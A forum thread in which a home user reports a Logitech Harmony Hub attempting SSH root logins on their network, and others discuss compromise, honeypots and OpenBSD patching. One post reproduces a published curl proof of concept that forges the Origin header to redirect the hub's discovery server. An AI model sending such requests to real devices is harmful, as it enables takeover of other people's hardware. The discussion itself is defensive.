think tank forum

technology » security issues and backdoors in commercial products

lucas's avatar
3 weeks ago
link
lucas
i ❤ demo
my pf firewall only lets two ports in, each going to ssh on a bsd-variant host. no other traffic can come in.

i have a logitech harmony hub internally using 10.6.6.5, with no external ports mapped to it.

it seems to be doing nefarious shit, like trying to login to ssh on my bsd-variant hosts:

Jan 24 18:39:29 atlas sshd[15390]: error: PAM: authentication error for root from 10.6.6.5
Jan 24 18:39:47 atlas sshd[15390]: error: PAM: authentication error for root from 10.6.6.5
Jan 24 18:39:47 atlas sshd[15390]: Failed keyboard-interactive/pam for root from 10.6.6.5 port 63813 ssh2


i'm second-guessing letting any commercial products on my lan. but maybe wifi lan should be treated like the wild west anyway, assuming hosts may be hostile?

thoughts?
phi_'s avatar
3 weeks ago
link
phi_
... and let the Earth be silent after ye.
Always assume hosts are hostile. Even if they're not, it's one 0-day exploit away from being so.

But I have NO idea why your Hub is even trying to do that ... Hub runs Linux, right? Could be compromised. Embedded Linux can be terrifyingly insecure...
phi_'s avatar
3 weeks ago
link
phi_
... and let the Earth be silent after ye.
"The hub processes all network requests from remote hosts, but attempts to verify the origin before actually handling the request. This is a great security mechanism in theory; however, the attacker can easily forge the origin with a single line in the HTTP header. This allows any remote attacker to bypass the origin validation check, giving them access to all of the protected message handling functionality."

https://medium.com/tenable-techblog/owning-th … 2135e4adac
lucas's avatar
3 weeks ago
link
lucas
i ❤ demo
in that article's exploit, someone needs to send a packet to the hub to change its timeserver.

curl -d "{'cmd':'setup.account?provision',
  'params':
    {
    'provisionInfo':
      {
        'mode':3,
        'authToken':'1',
        'discoveryServer':'http://10.0.0.10'
      }
    }
  }"
  -H "Origin: .myharmony.com"
  -H "Content-Type: application/json"
  http://10.0.0.176 :8088


which takes advantage of the hub's open port 8088. but like i mentioned, i don't open any of these ports to the internet.

so maybe another host on my network was compromised, and it passed such a packet to the hub to compromise it as well. or perhaps the hub was exploited using another vulnerability (my only guess would be a man-in-the-middle).

either way, i'm creeped out that the logitech harmony hub is trying to login to my fileserver over ssh. what should i do about that?
bluet's avatar
3 weeks ago
link
bluet
> either way, i'm creeped out that the logitech harmony hub is trying to login to my fileserver over ssh. what should i do about that?

let it log in, and see what it does! use a throwaway virtual machine as your honeypot
lucas's avatar
3 weeks ago
link
lucas
i ❤ demo
maybe give user root password of "password" ? or maybe no password with none required?

unfortunately, i haven't seen these attempts since. so maybe i missed my chance...

--

for now, i just took these steps to secure my other hosts:
- updated OSes and packages
- changed all sshd instances to only permit public key logins

--

also, does openbsd 4.9 really have no vulnerabilities besides this one regarding BIND? [errata49]
phi_'s avatar
3 weeks ago
link
phi_
... and let the Earth be silent after ye.
OpenBSD doesn't patch/address more than 1 or 2 minor versions back, so I'm sure there are more vulnerabilities than the BIND one that either weren't revealed or weren't fixed by the time 5.2 came out.
lucas's avatar
3 weeks ago
r1, link
lucas
i ❤ demo
why don't they say that anywhere? i've been trying to figure out if that's the case :/
phi_'s avatar
2 weeks ago
link
phi_
... and let the Earth be silent after ye.
I thought they did. If not, I may very well be mistaken. I've been operating under that impression this whole time, unfortunately. Maybe check out misc@ or bugs@ for more info. I know their packages never get updated once released in the -STABLE branches to keep older installations working. Perhaps it's the same with base... to keep too many minor changes from breaking previous versions?

If you are willing to run it on server hardware, -CURRENT should keep you in patches whenever they do come out. :/
lucas's avatar
5 days ago
link
lucas
i ❤ demo
i'd wager that you're right. i just had been looking for such information and failing to find it.
phi_'s avatar
11 hours ago
link
phi_
... and let the Earth be silent after ye.
Is there a specific reason for retaining 4.9 on that machine? You're missing out on YEARS of advancement and security upgrades.